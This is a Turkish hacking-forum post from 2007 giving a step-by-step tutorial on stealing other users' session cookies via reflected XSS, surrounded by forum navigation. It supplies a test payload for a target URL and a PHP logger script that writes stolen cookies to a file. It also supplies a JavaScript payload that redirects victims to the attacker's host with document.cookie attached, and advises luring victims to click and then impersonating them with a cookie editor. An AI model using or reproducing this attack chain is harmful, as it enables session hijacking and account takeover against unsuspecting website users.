The-Sabotage Cyber Hackers And Security Platform  

Portal Forum Kimler Online Bugünki Mesajlar Forumları Okundu Kabul Et
Geri git   The-Sabotage Cyber Hackers And Security Platform > || TSH || Hacking & Security > Web - Server Hacking & Security

Web - Server Hacking & Security Web Hacking Hakkında Bilmek istediğiniz Herşey,koruma yolları ve güncel açıklar ile ilgili Bölümümüz

Cevapla
 
LinkBack Seçenekler Stil
Alt 06-11-2007, 21:22   #1 (permalink)
SeCReT
Teğmen
 
SeCReT - ait Kullanıcı Resmi (Avatar)
 
Üyelik tarihi: Feb 2007
Mesajlar: 65
Xss ve Cookie ilişkisi

Xss çalmak nedemekdir ?
ne yani bu simdi biz hirsizmiyiz biseyler çalalim mantigiyla yola çikmayin ve dinleyin biraz (:-)) Simdi xss çalmanin mantigi sudur siz bir web sitesine girdiginizde site kendi cookie yapisina bagli olarak sizin bilgisayariniza bir cookie atar ve derki bu kullanicinin cookiesi budur benzetme yapacak olursak Nasil hepimizin Tc. Kimlik numarasi var isde hepimizin bi kimligi var Bu ülke içerisinde bu sayede taniniyorsak da cookiede ayni mantikla sitelere bizi tanitir ama aradaki fark bizim Tc. Kimlik numaramiz degismemesine ragmen Cookielerimiz degisir. Neden degisir derseniz onuda su sekilde bir örnekle açiklayayim Siz baska bi ülkenin vatandasi oldugunuzda Size Tc. Kimlik numaranizdaki numarayla ayni numarayi verirlermi tabii ki hayir e cookie degismesiyle alakasi ne diye soracak olursaniz sizin ip adresiniz genelde baglanti koptugunda degisir (Dinamik ip Oldugundan dolayi) ve siz her baska ip ile siteye giris yaptiginizda dogal olarakda cookie sizi baska birisi kabul edip yeni bi kimlik numarasi yanii bizim internet degimimizle cookie veriyo. Eger ana konuya dönecek olursak yani xss çalma mantigina siz eger isde gerekli makyaji yapip gerekli kimligi aldiginizda istediginiz isimle istediginiz yere girebilirsiniz degilmi mesela ameliyat olup basbakana benzerseniz ve onun kimligini alirsaniz basbakanliga girebilirsiniz (tavsiye etmem () ) ayni mantigi bozmadan devam edersek demekki biz baskasinin cookiesini çalip Siteye kendimizi onun gibi gösterirsek sitede istedigimiz kisi olabiliriz degilmi. Tabii ki evet ama önemli soru baskasinin kimligini nasil bulucaz tabii ki buda çok basit Xss Dedigimiz olaylar sayesinde simdi Xss çalmanin nedenini ve mantigini kavradigimiza göre artik xss çalma olayina Daha dogrusu metinin basindan beri xss çalma diye yaziyorum ama dogrusu ve gerçek deyimi cookie çalma yada xss ile cookie çalma olabilir böyle basladik böyle devam edelim bozmadan

Xss ile Coookie Nasil Çalinir
Simdi Xss ile cookie nasil çalinir bunu yapabilmek için java scriptten az çok anlamamiz gerekli normalde ama gerek yok burada ben gerekli komut ve bilgileri vermeye çalisacagim simdi bi site düsünelim ve bu sitede bi linke tikladigimizda o sayfayi yazdiran kodlar içersin ve adreside suna benzer bi sey olsun
[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...] Simdi Buradan ne anliyoruz id numarasi yada haber numarasi diyelim 12 olan yaziyi yazdir simdi onun üzerinde az oynarsak belki xss bulabiliriz ilk önce test için java scriptteki alert komutunu test edelim nasil yapicaz http://www.hedef.com/haber.php?yazdir=<script>alert("Xss");</script>
Burada eger xss yiyosa Ekranda Xss seklinde bi uyari görürüz bu nedemek olur tabiiki bu sitede java script çalistirabiliyoruz ozaman ne yapmamiz gerekli devaminda cookie çalmaya çalismaliyiz peki java scriptte cookie kodu ne
Kod:
<script>alert("document.cookie");</script>
bunu sitenin sonuna söyle yazdigimizda ne olucak dersiniz http://www.hedef.com/haber.php?yazdir=<script>alert(document.cookie);</script>
tabii ki deminki Xss diye uyari gördügümüz ekranda Kendi cookiemizi görücez peki baskasinin cookiesini almak için ne yapmali ilk önce bi sniffer hazirlanmali sniffer hazirlamakla ilgili döküman ileride ayrintili yazicam ama amacimiz su anda sadece isimizi su kodlar görüyoro

Kod:
<?php
$cookie = $_GET['cookie'];
$fp = fopen('log.php', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br>');
fclose($fp);
?>


bu kodu bi ftpye atip cal.php olarak kaydedicez Garanti olsun Chmod 777 de verelim hadi () ardindan ise java script yardimiyla diger kisilerin cookielerini çalmaya geldi onuda javadaki küçük bir oyunla halledicez
Kod:
<script>location.href='http://www.sitemiz.com/cal.php?cookie= '%2Bescape(document.cookie)</script>

bunu sitemizin = (Esittir)'inden sonra ekliyoruz ve cookiesini çalmak istedigimiz kisinin tiklamasini sagliyoruz burasi sizin yaraticiliginiza kalmis bunu nasil yaparsiniz siz düsünün bi iki mantik göstericek olursam mesela bir web sitesi hazirlayin we tiklatmali bi sekilde yapin yani nasil tarif edeyim biri siteye girdiginde sanki o linke tiklamis gibi olsun (en basit anlatimi) yanii cokiesi olussun e tiklatma adresinede bizim kendi cookie çalma kodumuzu yazarsak elbetteki cookiemiz kendi sitemizdeki cal.php de gözükecekdir.
Cookieyi Çaldik
ee Napicaz çaldik adamin kimligini ama kendimi gizleyip içeriye nasil giricem bilmiyorum basit cookie editör veya proxomitron gibi programlar yardimiyla kolayca girebilirsiniz
Dökümanin Asil Amaci Xss ve Cookie iliskisi oldugundan dolayi fazla Detaya girmedim dicekdim de yine bayagi sey anlattigimi düsünüyorum ama önemli olan benim anlatmam degil sizin anlamaniz anladiysaniz benim için sorun yok anlamadiginiz kismi bu baslik altindan sorabilirsiniz. Saygilarimla redLine

Gelenekdendir Buraya izinsiz Baska sitelerde yayinlamayiniz veya yayinlarsanizda TiTHacK // redLine'den Alintidir yazin dicem ama bu güne kadar yazdigim her dökümanin çalindigi gibi bunuda ayni sekilde çalip kendi yazmis gibi gösteren arkadaslar olacakdir neyse saglik olsun Kolay gelsin ()
__________________
[T][S][H]
SeCReT isimli Üye şimdilik offline konumundadır   Alıntı ile Cevapla
Cevapla



Konuyu Toplam 1 Üye okuyor. (0 Kayıtlı üye ve 1 Misafir)
 
Seçenekler
Stil

Yetkileriniz
Yeni Mesaj yazma yetkiniz Aktif değil dir.
Mesajlara Cevap verme yetkiniz aktif değil dir.
Eklenti ekleme yetkiniz Aktif değil dir.
Kendi Mesajınızı değiştirme yetkiniz Aktif değildir dir.

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-KodlarıKapalı
Trackbacks are Açık
Pingbacks are Açık
Refbacks are Açık


Bütün Zaman Ayarları WEZ +3 olarak düzenlenmiştir. Şu Anki Saat: 12:34 .


eXTReMe Tracker
PageRank ?????????

Powered by vBulletin
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
SEO by 3.0.0
The-Sabotage Hacker's
Saldırıya Karşı Güvenlik Devrede
Sitemap
3, 4, 5, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 98, 99, 101, 102, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 131, 132, 133, 135, 136, 137, 140, 141, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251,

Title
The-SaboTage Team* Terörle Mücadele Grup Komutanlığı* Özel Kuvvetler Grup Komutanlığı* Web Tasarım - Grafik Grup Komutanlığı* Personel Daire Başkanlığı* Savunma Grup Komutanlığı* Saldırı ve Operasyon Merkezi* || TSH || Hacking & Security* Hack'e Yeni Başlayanlar & Yardım Bölümü* Web - Server Hacking & Security* Video'lu Hack Anlatımları* Mail Hacking & Security* Pc Hacking & Security* İrc / Chat Hacking Ve Güvenlik* Exploit / Vulnerabilities* Keylogger & Trojan & Virüsler* Security* The-SaboTage Merkez Tanımı* The-SaboTage Duyurular* || TSH || Basında Biz ..* || TSH || Yeni Üyelerimiz ...* || TSH || Banned Users* Webmaster , Dizayn & Tasarım* Webmaster Bölümü* Photoshop & Flash* Google Adsense & Pagerank* Güncel Scriptler* PHP Scriptler* ASP Scriptler* Programlama Dilleri* Visual C.NET ve Visual C++.NET* Visual Basic ve Delphi* ASP ve PHP DiLLeri* Diğer Programlama Dilleri* Bilgisayar, İnternet ve Teknoloji Dünyası* Pc'niz İçin Güzel Programlar* Pc Oyunları* Resimli Program Anlatımı* Donanım & Donanım Sorunları* Bilgisayar Taktikleri & Bilinmeyenler* İşletim Sistemleri* Linux İşletim Sistemi* Windows İşletim Sistemi* İnternet Adresleri ( Bookmark )* Teknoloji Dünyasından Son Haberler* Msn & Yahoo Messenger Dünyası* Crack & Serials* İslam ve İnsan* İslami resimler* İslami Video ve fragmanlar* İslami programlar* Dini Hikayeler , Şiirler , Sohbetler* Dualar ve hadisler* The-SaboTage Cafe* Eğlence / Mizah / Geyik* Romantizm & Duygusallık & Sevgi* Derin Konular; Edebiyat/Felsefe* Tartışma Platformu* Eğitim , Öğretim & E-Kitap* Yerli ve Yabancı Mp3* Türkçe MP3* Yabancı MP3* Dizi Ve Film Müzikleri* Şarkı Sözleri* Yerli ve Yabancı Sinema* Vizyona Girecek Filmler* Türk Filmleri* Yabancı Filmler* Belgesel* Spor Köşesi* Beşiktaş* Fenerbahçe* Galatasaray* Trabzon Spor* Diğer Takımlar* Diğer Spor Haberleri* (Çöp Kutusu)* Çöp Kutusu* TsH United Foreigner Team The Area* Team Başvuru İnceleme Bölümü* Kriptografi (Şifreleme )* Güncel Açıklar* Karargah Destek Grup Komutanlığı* Ar-ge ve Yazılım Geliştirme Grup Komutanlığı* TSH Vip Bölüm (Priv8)* Vip Odası* M.KeMaL ATATüRK KöŞeSi* vbulletin* SMF* WordPress* oScommerce e-Ticaret Sistemi* Diğer* Joomla 1.0.x* Joomla 1.5.x* Joomla! İndir - Kur - Güncelle* Joomla! 1.0.x Resimli Dersler* Joomla! 1.0.x Güvenlik* Joomla! 1.0.x Soru - Cevap* Joomla! 1.0.x Eklenti İndir* Joomla 1.0.x Site Değerlendir* Joomla! 1.0.x SSS* Genel Sistem Soruları* Bileşen - Modül - Bot - Tema Soruları* Kurulumda Gelenler* Tema - CSS* Üye Yönetim* Haber - Yorum - İçerik* Güvenlik* Dil - Tercüme Eklentileri* Menü Eklentileri* Galeri - Ses - Görüntü* e-Ticaret* Dosya Yönetim* Uygunlaştırma - SEO - SEF* Form* Forum - Köprü - Entegre* Diğer Eklentiler* Tema - CSS* Üye Yönetim* Haber - Yorum - İçerik* Dil - Tercüme Eklentileri* Menü* Galeri - Ses - Görüntü* e-Ticaret* Dosya Yönetim* Uygunlaştırma - SEO - SEF* Form* Forum - Köprü - Entegre* Diğer Eklentiler* Joomla! Kurulum ve Güncelleme* Joomla! 1.5.x Soru - Cevap* Joomla! 1.5.x Tüm Eklentiler* Çeviri Talepleri* Proje Çözüm* Site Değerlendirme* Joomla! 1.5.x SSS* Genel Sistem Soruları* Eklenti Soru - Cevap* Kurulumda Gelenler* Tema - CSS* Üye Yönetim* Haber - Yorum - İçerik* Güvenlik* Dil - Tercüme* Menü* Galeri - Ses - Görüntü* e-Ticaret* Dosya Yönetim - Paylaşım* Form Araçları* Forum* Diğer Eklentiler* Haber - Duyuru - İndir* Soru - Cevap* Kurulumda Gelenler* Tema - CSS* Üye Yönetim* Haber - Yorum - İçerik* Güvenlik* Dil - Tercüme* Menü* Galeri - Ses - Görüntü* e-Ticaret* Dosya Yönetim - Paylaşım* Form Araçları* Forum* Diğer Eklentiler* vBulletin Genel Konular* vBulletin S.S.S* vBulletin Sorular & Cevaplar* vBulletin Siteleriniz* vBulletin Mod & Hack & Eklenti* vBulletin Temaları* vBulletin Dil Dosyaları* vBulletin Görsel Anlatımları* vBulletin Portal Entegrasyonları* Dökümantasyon* Modifikasyonlar* Sistem - İşletim* Temalar* Eklentiler* Temalar* osCommerce Soru - Cevap* osCommerce Kur - Güncelle* osCommerce Temalar* osCommerce Dil Dosyaları* osCommerce Eklentiler* osCommerce Güvenlik* osCommerce SSL - Pos - Ödeme* osCommerce Siteler* Php Fusion* Xoops* Mambo* PhpBB* myBB* IP.Board - Invision Power Board* Yazılı Anlatımlar-Dersler-Makaleler* Tanıtımlar-Tavsiyeler* Haberler-Gelişmeler-Duyurular* Görsel Anlatımlar (resim-video)* Hatırlatmalar-Uyarılar* Modifikasyon Soruları* Modifikasyon Tanıtımı* Kurulum ve Güncelleme* Dil Problemleri* Smf'de Başka sisteme geçişler* Başka sistemlerden Smf'ye geçişler* Portal birleşmeleri* Site Tanıtımları* Sizin Temalarınız* Tema Soruları* Tavsiye Temalar* IP.Board 2.3.x* IP.Board 2.2.x* IP.Board 2.2.x Altı* IP.Board Genel Bilgiler* IP.Board Dersler & Klavuzlar* IP.Board Güvenlik* IP.Board Dil Dosyaları* IP.Board Soru(n)larınız, Hatalar* IP.Board Siteler* ProfDizayn.com* Mambo Genel Sorular & Dersler* Mambo Bileşenler* Mambo Modüller* Mambo Temaları* Mambo Eklentileri* Mambo Çeviri* Mambo Siteler* Virüsler & Korunma Yöntemleri* Dökümanlar*